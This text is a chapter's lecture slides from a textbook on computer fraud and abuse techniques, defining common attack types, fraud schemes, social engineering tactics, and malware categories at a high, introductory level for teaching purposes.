Professional Documents
Culture Documents
Fifteenth Edition
Chapter 9
Computer Fraud and Abuse
Techniques
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Learning Objectives
• Compare and contrast computer attack and abuse tactics.
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Computer Attacks and Abuse
• There are six steps that many criminals use to attack
information systems:
– Conduct reconnaissance
– Attempt social engineering
– Scan and map the target
– Research
– Execute the attack
– Cover tracks
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Types of Attacks
• Hacking
– Unauthorized access, modification, or use of an
electronic device or some element of a computer
system
• Social Engineering
– Techniques or tricks on people to gain physical or
logical access to confidential information
• Malware
– Software used to do harm
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Hacking
– Hijacking
Gaining control of a computer to carry out illicit activities
– Botnet (robot network)
Zombies
Bot herders
Denial of Service (DoS) attack
Brute force attack
Password cracking
Dictionary attack
Spamming
Spoofing – Makes the communication look as if
someone else sent it so as to gain confidential
information
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Forms of Spoofing
• E-mail spoofing
• Caller ID spoofing
• IP address spoofing
• SMS spoofing
• Web-page spoofing (phishing)
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Hacking with Computer Code
• Cross-site scripting (XSS)
– Uses vulnerability of Web application that allows the
Web site to get injected with malicious code. When a
user visits the Web site, that malicious code is able to
collect data from the user.
• Buffer overflow attack
– Large amount of data sent to overflow the input
memory (buffer) of a program, causing it to crash and
replacing it with attacker’s program instructions.
• SQL injection (insertion) attack
– Malicious code inserted in place of a query to get to the
database information
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Other Types of Hacking
• Man in the middle (MITM)
– Hacker is placed in between a client (user) and a host
(server) to read, modify, or steal data.
• Masquerading/impersonation
• Piggybacking
• War dialing and driving
• Phreaking
• Podslurping
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Hacking Used for Embezzlement
• Salami technique:
– Taking small amounts at a time
Round-down fraud
• Economic espionage
– Theft of information, intellectual property, and trade
secrets
• Cyber-extortion
– Threats to a person or business online through e-mail
or text messages unless money is paid
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Hacking Used for Fraud
• Internet misinformation
• E-mail threats
• Internet auction
• Internet pump and dump
• Cryptocurrency fraud
• Click fraud
• Software piracy
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Social Engineering Techniques
• Identity theft • URL hijacking
– Assuming someone else’s – Takes advantage of
identity typographical errors entered in
• Pretexting for websites and user gets
– Using a scenario to trick invalid or wrong website
victims to divulge information • Scavenging
or to gain access – Searching trash for confidential
• Posing information
– Creating a fake business to • Shoulder surfing
get sensitive information – Snooping (either close behind
• Phishing the person) or using technology
– Sending an e-mail asking the to snoop and get confidential
victim to respond to a link that information
appears legitimate that • Skimming
requests sensitive data – Double swiping credit card
• Pharming • Eavesdropping
– Redirects website to a
spoofed website
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Why People Fall Victim
• Compassion
– Desire to help others
• Greed
– Want a good deal or something for free
• Sex appeal
– More cooperative with those that are flirtatious or good looking
• Sloth
– Lazy habits
• Trust
– Will cooperate if trust is gained
• Urgency
– Cooperation occurs when there is a sense of immediate need
• Vanity
– More cooperation when appeal to vanity
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Minimize the Threat of Social
Engineering
• Never let people follow you into restricted areas
• Never log in for someone else on a computer
• Never give sensitive information over the phone or through
e-mail
• Never share passwords or user IDs
• Be cautious of someone you don’t know who is trying to
gain access through you
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Types of Malware
• Spyware • Trap door
– Secretly monitors and collects – Set of instructions that allow the
information user to bypass normal system
– Can hijack browser, search controls
requests • Packet sniffer
– Adware, scareware – Captures data as it travels over
• Cyber-extortion the Internet
– Threatening to harm a • Virus
company or a person if a – A section of self-replicating code
specified amount of money is that attaches to a program or file
not paid requiring a human to do
• Keylogger something so it can replicate
– Software that records user itself
keystrokes • Worm
• Trojan Horse – Stand-alone self replicating
– Malicious computer program
instructions in an authorized
and properly functioning
program
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Cellphone Bluetooth Vulnerabilities
• Bluesnarfing
– Stealing contact lists, data, pictures on Bluetooth
compatible smartphones
• Bluebugging
– Taking control of a phone to make or listen to calls,
send or read text messages
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Key Terms (1 of 3)
• Hacking • Web-page spoofing
• Hijacking • Vulnerabilities
• Botnet • Zero-day attack
• Zombies • Patch
• Bot herder • Cross-site scripting (XSS)
• Denial-of-service (DoS) attack • Buffer overflow attack
• Brute force attack • SQL injection (insertion) attack
• Password cracking • Man-in-the-middle (MITM) attack
• Dictionary attack • Masquerading/impersonation
• Spamming • Piggybacking
• Spoofing • War dialing
• E-mail spoofing • War driving
• Caller ID spoofing • Phreaking
• IP address spoofing • Podslurping
• SMS spoofing
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Key Terms (2 of 3)
• Salami technique • Pretexting
• Round-down fraud • Posing
• Economic espionage • Phishing
• Cyber-bullying • Vishing
• Sexting • Carding
• Internet misinformation • Pharming
• E-mail threats • Evil twin
• Internet auction fraud • Typosquatting/URL hijacking
• Internet pump-and-dump fraud • Scavenging/dumpster diving
• Cryptocurrency fraud • Shoulder surfing
• Click fraud • Lebanese looping
• Software piracy • Skimming
• Social engineering • Chipping
• Identity theft • Eavesdropping
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Key Terms (3 of 3)
• Spyware • Worm
• Adware • Bluesnarfing
• Torpedo software • Bluebugging
• Scareware
• Cyber-extortion
• Ransomware
• Keylogger
• Trojan horse
• Time bomb/logic bomb
• Trap door/back door
• Packet sniffers
• Steganography program
• Rootkit
• Virus
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Copyright
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved